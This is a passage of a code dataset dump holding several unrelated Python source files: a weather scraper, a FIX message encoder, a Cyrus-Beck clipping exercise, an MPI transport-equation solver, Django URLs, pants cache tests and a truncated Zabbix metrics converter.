vidinfDf.loc[vidinfDf['Video'] == str(sample_feature_file_Name.replace('.' +wfileType, ''))]\r\n try:\r\n fps = int(fps['fps'])\r\n except TypeError:\r\n print('Error: make sure all the videos that are going to be analyzed are represented in the project_folder/logs/video_info.csv file')\r\n\r\n outFname = sample_feature_file_Name + '.' + wfileType\r\n csv_dir_out_validation = config.get('General settings', 'csv_path')\r\n csv_dir_out_validation = os.path.join(csv_dir_out_validation,'validation')\r\n if not os.path.exists(csv_dir_out_validation):\r\n os.makedirs(csv_dir_out_validation)\r\n outFname = os.path.join(csv_dir_out_validation, outFname)\r\n save_df(outputDf, wfileType, outFname)\r\n print('Predictions generated.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"simba/runmodel_1st.py","file_name":"runmodel_1st.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"526617046","text":"'''\n@Description this file is to provide code for scraping the weather information\n@Author rarer_997\n@Date 2019-10-08\n'''\nfrom urllib.request import urlopen # b_soup_1.py\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, date, time, timedelta\nimport pandas as pd\n\ncity_name = []\nfor i in range(3370,3694):\n city_name.append(str(i))\n'''\n@Description build the city and its relevant id dictionary\n@Author rarer_997\n@Date 2019-10-08\n'''\ncity = {\"3370\":\"Canberra\",\"3372\":\"Adelaide\",\"3418\":\"Brisbane\",\"3586\":\"Melbourne\",\"3677\":\"Sydney\"}\n\n#the function of getting the month's list between the start month and end month\ndef get_month_list(datestart,dateend):\n month = []\n while datestart<=dateend:\n date_temp = datestart.strftime('%Y-%m')\n if date_temp not in month:\n month.append(date_temp)\n datestart+=timedelta(days=1)\n return month\n\nstart = datetime.strptime(\"2013-11\",'%Y-%m')\nend = datetime.strptime(\"2018-5\",'%Y-%m')\n'''\n@Description get the month list from 2013-11 to 2018-05\n@Author rarer_997\n@Date 2019-10-08\n'''\nmonth = get_month_list(start,end)\n\nwriter = pd.ExcelWriter('weather_info.xlsx')\nfor city_number,city_name in city.items():\n name_list = ['date','start_weather','end_weather','max_temp','min_temp','start_wind','end_wind']\n City = pd.DataFrame(columns=name_list)\n for month_index in month:\n '''\n @Description get the certain cities' certain month's URL\n @Author rarer_997\n @Date 2019-10-08\n '''\n address = \"http://www.tianqihoubao.com/guoji/\"+city_number+\"/\"+month_index+\".html\"\n try:\n html = requests.get(address).content\n except:\n print(address)\n continue\n soup = BeautifulSoup(html,features=\"html.parser\")\n soup2 = soup.findAll('div', class_ = 'wdetail')\n for info in soup2:\n tr_list = info.find_all('tr')[1:]\n for tr in tr_list:\n temp_dict = {}\n td_list = tr.find_all('td')\n '''\n @Description get the relevant weather information and store them in a dict\n @Author rarer_997\n @Date 2019-10-08\n '''\n temp_dict['date'] = td_list[0].text.strip().replace(\"\\n\",\"\")\n temp_dict['start_weather'] = td_list[1].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['end_weather'] = td_list[1].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n temp_dict['max_temp'] = td_list[2].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['min_temp'] = td_list[2].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n temp_dict['start_wind'] = td_list[3].text.strip().replace(\"\\n\",\"\").split(\"/\")[0].strip()\n temp_dict['end_wind'] = td_list[3].text.strip().replace(\"\\n\",\"\").split(\"/\")[1].strip()\n City = City.append(temp_dict,ignore_index = True)\n City.to_excel(writer,sheet_name=city_name,index=False,encoding=\"utf-8\")\nwriter.save()\nwriter.close()","sub_path":"Scrape/weather_scrape/weather_data_scrap.py","file_name":"weather_data_scrap.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"531940743","text":"from typing import Iterator, List, Tuple\nfrom ..meta_data import (\n message_member_iter,\n MessageMemberMetaData,\n MessageMetaData,\n ProtocolMetaData,\n FieldMessageDataMap\n)\nfrom .errors import EncodingError\nfrom .common import SOH, encode_value\n\n\ndef _encode_fields(\n protocol: ProtocolMetaData,\n encoded_message: List[Tuple[bytes, bytes]],\n data: FieldMessageDataMap,\n meta_data: Iterator[MessageMemberMetaData]\n) -> None:\n for meta_datum in meta_data:\n # Check for required fields.\n if meta_datum.member.name not in data:\n if meta_datum.is_required:\n raise EncodingError(f'required field \"{meta_datum.member.name}\" is missing')\n continue\n\n item_data = data[meta_datum.member.name]\n if meta_datum.type == 'field':\n value = encode_value(protocol, meta_datum.member, item_data)\n encoded_message.append((meta_datum.member.number, value))\n elif meta_datum.type == 'group':\n value = encode_value(protocol, meta_datum.member, len(item_data))\n encoded_message.append((meta_datum.member.number, value))\n for group_item in item_data:\n _encode_fields(\n protocol,\n encoded_message,\n group_item,\n message_member_iter(meta_datum.children.values())\n )\n else:\n raise EncodingError(f'unknown type \"{meta_datum.type}\" for item \"{meta_datum.member.name}\"')\n\n\ndef _regenerate_integrity(\n protocol: ProtocolMetaData,\n encoded_message: List[Tuple[bytes, bytes]],\n sep: bytes,\n convert_sep_for_checkum: bool\n) -> bytes:\n body = sep.join(field + b'=' + value for field, value in encoded_message[2:-1]) + sep\n body_lengh = len(body)\n\n encoded_header = [\n (protocol.fields_by_name['BeginString'].number, protocol.begin_string),\n (protocol.fields_by_name['BodyLength'].number, str(body_lengh).encode('ascii'))\n ]\n header = sep.join(field + b'=' + value for field, value in encoded_header) + sep\n\n buf = header + body\n\n # Calculate the checksum\n check_sum = sum(buf if sep == SOH or not convert_sep_for_checkum else buf.replace(sep, SOH)) % 256\n buf += protocol.fields_by_name['CheckSum'].number + b'=' + f'{check_sum:#03}'.encode('ascii') + sep\n\n return buf\n\n\ndef encode(\n protocol: ProtocolMetaData,\n data: FieldMessageDataMap,\n meta_data: MessageMetaData,\n *,\n sep: bytes = SOH,\n regenerate_integrity: bool = True,\n convert_sep_for_checksum: bool = True\n) -> bytes:\n encoded_message: List[Tuple[bytes, bytes]] = []\n\n if regenerate_integrity:\n data['BeginString'] = protocol.begin_string.decode('ascii')\n data['BodyLength'] = 0\n data['CheckSum'] = '000'\n\n _encode_fields(protocol, encoded_message, data, message_member_iter(protocol.header.values()))\n _encode_fields(protocol, encoded_message, data, message_member_iter(meta_data.fields.values()))\n _encode_fields(protocol, encoded_message, data, message_member_iter(protocol.trailer.values()))\n\n if regenerate_integrity:\n buf = _regenerate_integrity(protocol, encoded_message, sep, convert_sep_for_checksum)\n else:\n buf = sep.join(field + b'=' + value for field, value in encoded_message) + sep\n\n return buf\n","sub_path":"src/aiofix/fix_message/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"106625257","text":"import numpy as np\r\nimport math as m\r\n\r\n#Calculate D:\r\ndef D(x_0,y_0,x_1,y_1):\r\n x_D=(x_1-x_0)\r\n y_D=(y_1-y_0)\r\n D=[x_D,y_D]\r\n return D\r\n\r\ndef NiD(func):\r\n N=[(-1,0),(0,1),(1,0),(0,-1)] #[left, top, right, bottom]\r\n ND=[] #[left, top, right, bottom]\r\n for i in range(0,len(N)):\r\n ND.append(np.dot(N[i],func))\r\n\r\n return ND\r\n\r\n\r\n# P=(x_0,y_0)+(np.dot(t,D))\r\ndef calculateT(i):\r\n if(i==0):\r\n return round((-(x_0-x_min)/(x_1-x_0)),8) # t_left(x_0,x_1,x_min)\r\n\r\n elif(i==1):\r\n return round((-(x_0-x_max)/(x_1-x_0)),8) #t_right(x_0,x_1,x_max):\r\n\r\n elif(i==2):\r\n return round((-(y_0-y_max)/(y_1-y_0)),8) #t_top(y_0,y_1,y_max):\r\n\r\n elif(i==3):\r\n return round((-(y_0-y_min)/(y_1-y_0)),8) #t_bottom(y_0,y_1,y_min):\r\n\r\n\r\ndef P(x_0, y_0, t, func):\r\n D=func\r\n tdotD=np.dot(t,D)\r\n p=np.sum([[x_0,y_0],tdotD],axis=0)\r\n return p\r\n\r\n\r\ndef cyrusBeck(x_0,y_0,x_1,y_1):\r\n lineSegment=[[x_0,y_0],[x_1,y_1]]\r\n N=[(-1,0),(0,1),(1,0),(0,-1)]\r\n c=0\r\n tEntering=[] #[left, top, right, bottom]\r\n tLeaving=[] #[left, top, right, bottom]\r\n d=D(x_0,y_0,x_1,y_1)\r\n NdotD=[] #[left, top, right, bottom]\r\n NdotPoints=[]\r\n t=[]\r\n P1=[x_1,y_1]\r\n P0=[x_0,y_0]\r\n P0_new=[]\r\n P1_new=[]\r\n \r\n if(P1==P0):\r\n print(\"lol\")\r\n else:\r\n t_Enter=0\r\n t_Leave=1 \r\n NdotD=NiD(d)\r\n for i in range(0,len(NdotD)):\r\n if(NdotD[i]!=0):\r\n theT=calculateT(i)\r\n t.append(theT)\r\n if(NdotD[i]<0):\r\n NdotPoints.append(\"PL\")\r\n finaltE=t[i]\r\n tEntering.append(finaltE)\r\n elif(NdotD[i]>0):\r\n NdotPoints.append(\"PE\")\r\n finaltL=t[i]\r\n tLeaving.append(finaltL)\r\n\r\n \r\n print(f\"This is N points based on Ni.D sequencing left, top, right, bottom:{N}\")\r\n print(f\"This is Ni.D sequencing left, top, right, bottom: {NdotD}\")\r\n print(f\"This is PL/PE points based on Ni.D sequencing left, top, right, bottom: {NdotPoints}\")\r\n print(f\"This is all the t values sequencing left, top, right, bottom: {t}\")\r\n print(f\"These are all the tE that enters the clip window as per to PE: {tEntering}\")\r\n print(f\"These are all the tL that enters the clip window as per to PL: {tLeaving}\")\r\n \r\n \r\n print(f\"t_e max: {max(tEntering)}\")\r\n print(f\"t_l min: {min(tLeaving)}\")\r\n print(f\"Value of D: {d}\")\r\n print(\"---------------------------------------------------------------\")\r\n if(max(tEntering)>min(tLeaving)):\r\n print(\"tE is greater then tL\") \r\n else:\r\n P0_new = P(x_0,y_0,max(tEntering),d)\r\n P1_new = P(x_0,y_0,min(tLeaving),d)\r\n \r\n\r\n return [P0_new, P1_new], max(tEntering), min(tLeaving)\r\n\r\n\r\n#boundary\r\nx_min=21\r\ny_min=42\r\n\r\nx_max=-2\r\ny_max=1\r\n\r\n#points\r\nx_0=-1\r\ny_0=55\r\n\r\nx_1=68\r\ny_1=-37\r\n\r\nresult=[]\r\nresult, tE, tL=cyrusBeck(x_0,y_0,x_1,y_1)\r\nT=tL-tE\r\nprint(f\"Value of tL-tE: {T}\")\r\nx=result[0]\r\ny=result[1]\r\nx_2=np.square(np.subtract(x[0],y[0]))\r\ny_2=np.square(np.subtract(x[1],y[1]))\r\nfinal=x_2+y_2\r\nprint(f\"Length of lineSegment: {m.sqrt(final)}\")\r\n\r\nprint(f\"P({tE})= {result[0]}\")\r\nprint(f\"P({tL})= {result[1]}\")\r\n","sub_path":"CyrusBeck.py","file_name":"CyrusBeck.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570233711","text":"from potentialflowvisualizer import *\n\nfield = Flowfield(\n objects=[\n Freestream(u=1, v=0),\n Source(strength=5, x=-5, y=0),\n Vortex(strength=5, x=0, y=5),\n Doublet(strength=5, x=0, y=0, alpha=0),\n LineVortex(strength=-5, x1 = 0, y1 = -5, x2 = 5, y2 = 0),\n LineSource(strength=-5, x1 = 0, y1 = 5, x2 = 5, y2 = 0),\n ]\n)\n\nfield.draw(\"potential\")\nfield.draw(\"streamfunction\")\nfield.draw(\"xvel\")\nfield.draw(\"yvel\")\nfield.draw(\"velmag\")\n","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"192868297","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\nfrom mpi4py import MPI\n\nif __name__ == \"__main__\":\n a = 0.25; T = 2.0; X = 100.0\n X_original = X\n fi = lambda x: math.sin(x/10) #t=0\n ksi = lambda t: t**3#x=0\n f = lambda t, x: math.sin(x*t/2) + t**3\n \n \n h = h_original = 0.01\n tau = tau_original = 0.01\n # tau = h/a \n # tau = 1.2 * h/a \n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm.Get_rank()\n est_time = []\n nodes_amount = []\n # y = [] \n # t =[] \n # comp_per_unit = 0\n # last_unit_comp = 0\n if size != 1:\n if sys.argv[1] == 'speedup':\n repeat_times = 10\n else:\n repeat_times = 1\n\n transfer_time = 0\n for _ in range(repeat_times):\n X = X_original\n X += h\n nodes_amount.append((X/h)*(T/tau))\n comp_per_unit = (X // h) // size #computations per unit\n if X // h % size == 0:\n last_unit_comp = comp_per_unit + 1 #last unit computations\n else:\n last_unit_comp = (X // h) - comp_per_unit * (size-1) + 1\n t = np.arange(0, T + tau, tau)\n\n if rank != size - 1:\n x = np.arange(rank * comp_per_unit * h, (rank + 1) * comp_per_unit * h - h*0.0000001, h)#crashed here smtimes\n else:\n x = np.arange(rank * comp_per_unit * h, (rank * comp_per_unit + last_unit_comp) * h, h)\n\n y = [0] * len(t)\n for i in range(len(t)):\n y[i] = [0.] * len(x)\n\n for j in range(0, len(x)):\n y[0][j] = fi(x[j]) # edge conditions x: u(0,x) = fi(x)\n \n\n if rank != 0 and rank != size - 1:\n for i in range(0, len(t) - 1):\n left_border = comm.recv(source=rank-1, tag=1) # left border\n comm.send(y[i][len(x) - 1], dest=rank+1, tag=1)\n right_border = comm.recv(source=rank+1, tag=0) # right border\n comm.send(y[i][0], dest=rank-1, tag=0)\n y[i+1][0] = 0.5*(y[i][1] + left_border) - 0.5*(tau/h)*(y[i][1] - left_border) + tau*f(t[i], x[0])#mb err\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = 0.5*(right_border + y[i][len(x)-2]) - 0.5*(tau/h)*(right_border - y[i][len(x)-2]) + tau*f(t[i], x[len(x) - 1])\n y = np.array(y)\n comm.send(y, dest = size - 1, tag=2)\n # print(\"rank: {} time: {} rcvd from b: {} rcvd from s: {} send to b: {} send to s: {}\".format(rank, ))\n\n\n if rank == 0:\n for i in range(0, len(t)):\n y[i][0] = ksi(t[i])\n comp_time = 0\n for i in range(0, len(t) - 1):\n tr_s = MPI.Wtime()\n comm.send(y[i][len(x) - 1], dest=1, tag=1)\n right_border = comm.recv(source=1, tag=0)\n transfer_time = MPI.Wtime() - tr_s\n start = MPI.Wtime()\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = 0.5*(right_border + y[i][len(x)-2]) - 0.5*(tau/h)*(right_border - y[i][len(x)-2]) + tau*f(t[i], x[len(x) - 1])\n comp_time += MPI.Wtime() - start\n y = np.array(y)\n est_time.append(comp_time)\n print(\"start time: {}\".format(comp_time))\n comm.send(y, dest=size-1, tag=2)\n\n if rank == size - 1:\n for i in range(0, len(t) - 1):\n left_border = comm.recv(source=rank-1, tag=1)\n comm.send(y[i][0], dest=rank-1, tag=0)\n y[i+1][0] = 0.5*(y[i][1] + left_border) - 0.5*(tau/h)*(y[i][1] - left_border) + tau*f(t[i], x[0])\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = y[i][len(x) - 1] - tau*(y[i][len(x) - 1]-y[i][len(x) - 2])/h + tau*f(t[i], x[j])\n y = np.array(y)\n for i in range(size - 2, -1, -1):\n recieved_data = comm.recv(source=i, tag=2)\n y = np.concatenate((recieved_data, y), axis=1)\n\n h *= 0.93\n tau *= 0.93\n\n\n\n\n if rank == size - 1 and sys.argv[1] == 'plot':\n print(\"cpu: \", comp_per_unit, \" luc: \", last_unit_comp)\n fig3 = plt.figure()\n ax3 = fig3.add_subplot(111, projection='3d')\n x = np.arange(0, ((size - 1) * comp_per_unit + last_unit_comp) * h_original, h_original)\n x, t = np.meshgrid(x, t)\n print('x: ',x.shape,' t: ', t.shape, ' y: ', y.shape )\n ax3.plot_surface(x, t, y)\n\n ax3.set_xlabel('plot for %d workers' % size)\n ax3.set_xlabel('x')\n ax3.set_ylabel('t')\n ax3.set_zlabel('u')\n # plt.show()\n plt.savefig('%dwplot.png' % (size))\n\n\n if rank == 0 and sys.argv[1] == 'speedup':\n fig3 = plt.figure()\n ax3 = fig3.add_subplot(111)\n x = np.array(nodes_amount)\n y = np.array(est_time)\n # ax3.set_xscale('log')\n # ax3.set_yscale('log')\n ax3.plot(x, y)\n ax3.set_title('speedup for %d workers\\nwith ttpn (ms): %f\\nestimated time: %f' % (size, transfer_time / (1000*(h/0.93)*(tau/0.93)), est_time[0]))\n ax3.set_xlabel('nodes amount')\n ax3.set_ylabel('time estimated')\n # plt.show()\n plt.savefig('%dwspeedup.png' % (size))\n else:\n x = np.arange(0, X + h, h)\n t = t = np.arange(0, T + tau, tau)\n y = [0] * len(t)\n start = MPI.Wtime()\n for i in range(len(t)):\n y[i] = [0.] * len(x)\n y[i][0] = ksi(t[i])\n for j in range(0, len(x)):\n y[0][j] = fi(x[j]) # edge conditions x: u(0,x) = fi(x)\n for i in range(0, len(t) - 1):\n for j in range(1, len(x) - 1):\n y[i+1][j] = 0.5*(y[i][j+1] + y[i][j-1]) - 0.5*(tau/h)*(y[i][j+1] - y[i][j-1]) + tau*f(t[i], x[j])\n y[i+1][len(x) - 1] = y[i][len(x) - 1] - tau*(y[i][len(x) - 1]-y[i][len(x) - 2])/h + tau*f(t[i], x[j])\n finish = MPI.Wtime()\n fig = plt.figure()\n ax = fig.add_subplot(111,projection='3d')\n x, t = np.meshgrid(x, t)\n u = np.array(y)\n ax.plot_surface(x,t,u)\n ax.set_title('line version.\\nestimated time: %f' % (finish - start))\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('u')\n plt.savefig('1w.png')\n # python3 app.py\n","sub_path":"PP/transferEquation/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"369375245","text":"from django.urls import path\nfrom blog.views import PostDetailView, search, PostBlogView, UpdateBlogView, DeleteBlogView, CommentReplyView\n\n\nurlpatterns = [\n\n path( 'post_blog_page/', PostBlogView.as_view(), name='post_blog_page' ),\n path( 'post_blog_page/update/', UpdateBlogView.as_view(), name='update_blog_page' ),\n path( 'post_blog_page/delete/', DeleteBlogView.as_view(), name='delete_blog_page' ),\n path( 'post//', PostDetailView.as_view(), name='post' ),\n path( 'post//comment//reply', CommentReplyView.as_view(), name='reply' ),\n path( 'q', search, name='search' ),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156525962","text":"n=int(input())\nif n==1:\n print(1)\nelif n==11:\n print(2)\nelse:\n s='111'\n while true:\n \n a=int(s)\n if a%n==0:\n print(len(s))\n break\n else:\n s+='1'\n ","sub_path":"Code/CodeRecords/2367/60648/268241.py","file_name":"268241.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472100624","text":"# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nimport os\nimport unittest\n\nfrom pants.cache.artifact import ArtifactError, DirectoryArtifact, TarballArtifact\nfrom pants.util.contextutil import temporary_dir\nfrom pants.util.dirutil import safe_mkdir, safe_open\nfrom pants_test.test_base import TestBase\n\n\nclass TarballArtifactTest(TestBase):\n\n def setUp(self):\n super().setUp()\n # Init engine because decompression now goes through native code.\n self._init_engine()\n TarballArtifact.NATIVE_BINARY = self._scheduler._scheduler._native\n\n def test_get_paths_after_collect(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n cache_root = os.path.join(tmpdir, 'cache')\n safe_mkdir(cache_root)\n\n file_path = self.touch_file_in(artifact_root)\n\n artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n artifact.collect([file_path])\n\n self.assertEqual([file_path], list(artifact.get_paths()))\n\n def test_does_not_exist_when_no_tar_file(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n cache_root = os.path.join(tmpdir, 'cache')\n safe_mkdir(cache_root)\n\n artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n self.assertFalse(artifact.exists())\n\n def test_exists_true_when_exists(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n cache_root = os.path.join(tmpdir, 'cache')\n safe_mkdir(cache_root)\n\n path = self.touch_file_in(artifact_root)\n\n artifact = TarballArtifact(artifact_root, os.path.join(cache_root, 'some.tar'))\n artifact.collect([path])\n\n self.assertTrue(artifact.exists())\n\n def test_non_existent_tarball_extraction(self):\n with temporary_dir() as tmpdir:\n artifact = TarballArtifact(artifact_root=tmpdir, tarfile_='vapor.tar')\n with self.assertRaises(ArtifactError):\n artifact.extract()\n\n def test_corrupt_tarball_extraction(self):\n with temporary_dir() as tmpdir:\n path = self.touch_file_in(tmpdir, content='invalid')\n artifact = TarballArtifact(artifact_root=tmpdir, tarfile_=path)\n with self.assertRaises(ArtifactError):\n artifact.extract()\n\n def touch_file_in(self, artifact_root, content=''):\n path = os.path.join(artifact_root, 'some.file')\n with safe_open(path, 'w') as f:\n f.write(content)\n return path\n\n\nclass DirectoryArtifactTest(unittest.TestCase):\n def test_exists_when_dir_exists(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n\n artifact_dir = os.path.join(tmpdir, 'cache')\n safe_mkdir(artifact_dir)\n\n artifact = DirectoryArtifact(artifact_root, artifact_dir)\n self.assertTrue(artifact.exists())\n\n def test_does_not_exist_when_dir_missing(self):\n with temporary_dir() as tmpdir:\n artifact_root = os.path.join(tmpdir, 'artifacts')\n\n artifact_dir = os.path.join(tmpdir, 'cache')\n\n artifact = DirectoryArtifact(artifact_root, artifact_dir)\n self.assertFalse(artifact.exists())\n","sub_path":"tests/python/pants_test/cache/test_artifact.py","file_name":"test_artifact.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57905619","text":"def same_ascii(a, b):\n s1 = 0\n s2 = 0\n for i in a:\n s1 += ord(i)\n for i in b:\n s2 += ord(i)\n if s1 == s2:\n return True\n else:\n return False\n","sub_path":"_algorithms_challenges/edabit/_Edabit-Solutions-master/Same ASCII_/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"83250930","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport lib.utils as utils\n\n\ndef jdumps(o):\n return json.dumps(o, ensure_ascii=False)\n\n\ndef i_m(base_metric, tpl, **kwargs):\n if not kwargs:\n return \".\".join([base_metric, tpl])\n\n prep_kwargs = {\n kw: _str_prep(kwargs[kw]) for kw in kwargs\n }\n return \".\".join([base_metric, tpl.format(**prep_kwargs)])\n\n\ndef z_m(tpl, **kwargs):\n prep_kwargs = {\n _str_prep(kw): _str_prep(kwargs[kw]) for kw in kwargs\n }\n return tpl.format(**prep_kwargs)\n\n\ndef _str_prep(s):\n if isinstance(s, (int, float)):\n s = str(s)\n return reduce(\n lambda s, d: s.replace(d[0], d[1]),\n ((\".\", \"_\"), (\"_[\", \".\"), (\"]\", \"\")),\n s\n )\n\ndef transliterate(name):\n to_replace = {'ж': 'zh', 'о': 'o', 'п': 'p', 'а': 'a', 'б': 'b', 'в': 'v',\n 'г': 'g', 'д': 'd', 'е': 'e', 'ё': 'e', 'з': 'z', 'и': 'i',\n 'й': 'i', 'к': 'k', 'л': 'l', 'м': 'm', 'н': 'n', 'р': 'r',\n 'с': 's', 'т': 't', 'у': 'u', 'ф': 'f', 'х': 'h', 'ц': 'c',\n 'ч': 'cz', 'ш': 'sh', 'щ': 'scz', 'ъ': '', 'ы': 'y', 'ь': '',\n 'э': 'e', 'ю': 'u', 'я': 'ja', 'А': 'a', 'Б': 'b', 'В': 'v',\n 'Г': 'g', 'Д': 'd', 'Е': 'e', 'Ё': 'e', 'Ж': 'zh', 'З': 'z',\n 'И': 'i', 'Й': 'i', 'К': 'k', 'Л': 'l', 'М': 'm', 'Н': 'n',\n 'О': 'o', 'П': 'p', 'Р': 'r', 'С': 's', 'Т': 't', 'У': 'u',\n 'Ф': 'Х', 'Ц': 'c', 'Ч': 'cz', 'Ш': 'sh', 'Щ': 'scz', 'Ъ': '',\n 'Ы': 'y', 'Ь': '', 'Э': 'e', 'Ю': 'u', 'Я': 'ja', ',': '',\n '?': '', ' ': '_', '~': '', '!': '', '@': '', '#': '', '$': '',\n '%': '', '^': '', '&': '', '*': '', '(': '', ')': '',\n '=': '', '+': '', ':': '', ';': '', '<': '', '>': '', '\\'': '',\n '\"': '', '\\\\': '', '/': '', '№': '', '[': '', ']': '', '{': '',\n '}': '', 'ґ': '', 'ї': '', 'є': '', 'Ґ': 'g', 'Ї': 'i', 'Є': 'e',\n u'\\x01': '', u'\\x05': ''}\n\n for key in to_replace:\n try:\n name = name.replace(unicode(key), to_replace[key])\n except:\n try:\n name = name.replace(key, to_replace[key])\n except:\n pass\n return name\n\n\ndef to_zabbix(analyzer_name, raw_metrics):\n metrics = {\n \"autodiscovery\": [],\n \"static\": [],\n \"dynamic\": []\n }\n m_autodiscovery = metrics[\"autodiscovery\"].append\n m_static = metrics[\"static\"].append\n m_dynamic = metrics[\"dynamic\"].append\n\n mcasts = set()\n mcast_sids = set()\n mcast_sids_pids = set()\n qam_tss = set()\n qam_tss_sids = set()\n for ts in raw_metrics[\"tss\"]:\n mcasts.add(ts)\n ts_info = raw_metrics[\"tss\"][ts]\n for svc in ts_info[\"services\"]:\n if svc == \"count\":\n continue\n svc_info = ts_info[\"services\"][svc]\n mcast_sid = z_m(\"{ts}*SID-{sid}\", ts=ts, sid=svc)\n mcast_sids.add(mcast_sid)\n for pid in svc_info[\"pids\"]:\n mcast_sid_pid = z_m(\"{mcast_sid}*PID-{pid}\", mcast_sid=mcast_sid, pid=pid)\n mcast_sids_pids.add(mcast_sid_pid)\n\n m_autodiscovery((analyzer_name, \"get_ts\", jdumps({\"data\": [{\"{#TS}\": _str_prep(ts)} for ts in mcasts]})))\n if raw_metrics.get(\"is_scr\", False):\n m_autodiscovery((analyzer_name, \"get_sid\", jdumps({\"data\": [{\"{#SID}\": _str_prep(sid)} for sid in mcast_sids]})))\n\n if raw_metrics.get(\"is_rgs\", False):\n for qts in raw_metrics[\"qam\"][\"tss\"]:\n qam_tss.add(qts)\n for qsvc in raw_metrics[\"qam\"][\"tss\"][qts][\"services\"]:\n qam_tss_sids.add(z_m(\"{qts}*SID-{qsid}\", qts=qts, qsid=qsvc))\n\n m_autodiscovery((analyzer_name, \"get_qam\", jdumps({\"data\": [{\"{#QAM}\": _str_prep(qam)} for qam in qam_tss]})))\n\n m_autodiscovery((analyzer_name, \"get_qam_sid\", jdumps({\"data\": [{\"{#QAM_SID}\": _str_prep(qam)} for qam in qam_tss_sids]})))\n\n for qts in raw_metrics[\"qam\"][\"tss\"]:\n ts_data = raw_metrics[\"qam\"][\"tss\"][qts]\n for p_name in (\n (\"current_bitrate\", \"net_bitrate\"),\n (\"max_centre_frequency_offset\", \"frequency_offset\"),\n (\"minSnr\", \"snr\"),\n (\"minMer\", \"mer\"),\n \"min_signal_level\", \"max_signal_level\", \"sid_count\"):\n if isinstance(p_name, tuple):\n p_real_name, p_name = p_name\n value = utils.get(ts_data, p_real_name)\n else:\n value = utils.get(ts_data, p_name)\n if isinstance(value, basestring):\n value = value.split(\" \")[0]\n metric = z_m(\"{p_name}_[{qts}]\", p_name=p_name, qts=qts)\n m_dynamic((analyzer_name, metric, value))\n\n for qsvc in raw_metrics[\"qam\"][\"tss\"][qts][\"services\"]:\n qsvc_data = raw_metrics[\"qam\"][\"tss\"][qts][\"services\"][qsvc]\n metric = z_m(\"pids_[{qts}*SID-{qsvc}]\", qts=qts, qsvc=qsvc)\n m_dynamic((analyzer_name, metric, qsvc_data[\"pid_count\"]))\n\n for p_name in (\"uptime\", \"bitrate\", \"cpu_temp\", \"free_mem\", \"free_disc\", \"port\", \"version\", \"time\",\n \"time_qam\", \"time_qam_diff\", \"time_eth\", \"time_eth_diff\"):\n\n m_static((analyzer_name, p_name, utils.get(raw_metrics, p_name)))\n\n tss_data = raw_metrics.get(\"tss\", {})\n for ts in tss_data:\n ts_data = raw_metrics[\"tss\"][ts]\n for p_name in (\"net_bitrate\", \"cc_errors\",\n \"crc\", (\"mlrerr1m\", \"mlr\"), (\"iatPeak1m\", \"iat\")):\n\n if isinstance(p_name, tuple):\n p_real_name, p_name = p_name\n value = utils.get(ts_data, p_real_name)\n else:\n value = utils.get(ts_data, p_name)\n metric = z_m(\"{p_name}_[{ts}]\", p_name=p_name, 